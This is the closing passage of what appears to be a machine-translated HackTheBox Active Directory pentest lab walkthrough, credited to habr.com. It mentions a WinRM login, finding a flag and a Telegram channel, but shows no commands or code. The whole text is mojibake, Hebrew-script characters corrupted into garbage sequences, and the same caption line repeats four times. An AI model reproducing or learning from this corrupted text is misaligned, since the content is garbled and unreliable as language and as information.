ื“ืขืจื ืึธืš ืœืึธื–ืŸ ืื•ื ื“ื– ื ื•ืฆืŸ ืื ื“ืขืจืŸ, ื’ืจื™ื ื’ืขืจ ืื™ื™ื ืขืจ, ืฉืจื™ืคื˜ ืฆื• ืคืึทืจื‘ื™ื ื“ืŸ ืฆื• WinRM. ื–ืืœ ืก ืขืคืขื ืขืŸ ืื•ืŸ ื˜ื•ื™ืฉืŸ ื“ื™ ืงืฉืจ ืคึผืึทืจืึทืžืขื˜ืขืจืก.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืžื™ืจ ืคึผืจื•ื‘ื™ืจืŸ ืฆื• ืคืึทืจื‘ื™ื ื“ืŸ, ืื•ืŸ ืžื™ืจ ื–ืขื ืขืŸ ืื™ืŸ ื“ื™ ืกื™ืกื˜ืขื.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืื‘ืขืจ ืขืก ืื™ื– ืงื™ื™ืŸ ืคืึธืŸ. ื“ืขืจื ืึธืš ืงื•ืง ื“ื™ ื‘ืึทื ื™ืฆืขืจ ืื•ืŸ ืงืึธื ื˜ืจืึธืœื™ืจืŸ ื“ื™ ื“ืขืกืงื˜ืึทืคึผืก.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืžื™ืจ ื’ืขืคึฟื™ื ืขืŸ ื“ื™ ืคืึธืŸ ื‘ื™ื™ mr3ks ืื•ืŸ ื“ื™ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืื™ื– 100% ื’ืขืขื ื“ื™ืงื˜.

HackTheBoxendgame. ื“ื•ืจื›ืคืึธืจ ืคื•ืŸ ื“ืขืจ ืœืึทื‘ืึธืจืึทื˜ืึธืจื™ืข ืคืึทื›ืžืึทืŸ ืึทืคืขื ืกื™ื•ื• ืึธืคึผืขืจืึทื˜ื™ืึธื ืก. Pentest Active Directory

ืึทื– ืก ืึทืœืข. ื•ื•ื™ ืึท ื‘ืึทืžืขืจืงื•ื ื’ืขืŸ, ื‘ื™ื˜ืข ื‘ืึทืžืขืจืงื•ื ื’ ืฆื™ ืื™ืจ ื’ืขืœืขืจื ื˜ ืขืคึผืขืก ื ื™ื™ึท ืคื•ืŸ ื“ืขื ืึทืจื˜ื™ืงืœ ืื•ืŸ ืฆื™ ืขืก ืื™ื– ื ื•ืฆื™ืง ืคึฟืึทืจ ืื™ืจ.

ืื™ืจ ืงืขื ืขืŸ ืคืึทืจื‘ื™ื ื“ืŸ ืื•ื ื“ื– ืื™ืŸ ื˜ืขืœืขื’ืจืึทื. ื“ืึธืจื˜ ืื™ืจ ืงืขื ืขืŸ ื’ืขืคึฟื™ื ืขืŸ ื˜ืฉื™ืงืึทื•ื•ืข ืžืึทื˜ืขืจื™ืึทืœืก, ืœื™ืงื˜ ืงืึธืจืกืึทื–, ื•ื•ื™ ื’ืขื–ื•ื ื˜ ื•ื•ื™ ื•ื•ื™ื™ื›ื•ื•ืืจื’. ืœืึธืžื™ืจ ืงืœื™ื™ึทื‘ืŸ ืึท ืงื”ืœ ืื™ืŸ ื•ื•ืึธืก ืขืก ื•ื•ืขื˜ ื–ื™ื™ืŸ ืžืขื ื˜ืฉืŸ ื•ื•ืึธืก ืคึฟืึทืจืฉื˜ื™ื™ืŸ ืคื™ืœืข ื’ืขื‘ื™ื˜ืŸ ืคื•ืŸ IT, ืื•ืŸ ืžื™ืจ ืงืขื ืขืŸ ืฉื˜ืขื ื“ื™ืง ื”ืขืœืคึฟืŸ ื™ืขื“ืขืจ ืื ื“ืขืจืข ืื™ืŸ ืงื™ื™ืŸ IT ืื•ืŸ ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข ื–ื™ื›ืขืจื”ื™ื™ื˜ ื™ืฉื•ื–.

ืžืงื•ืจ: www.habr.com

ืœื™ื™ื’ืŸ ืึท ื‘ืึทืžืขืจืงื•ื ื’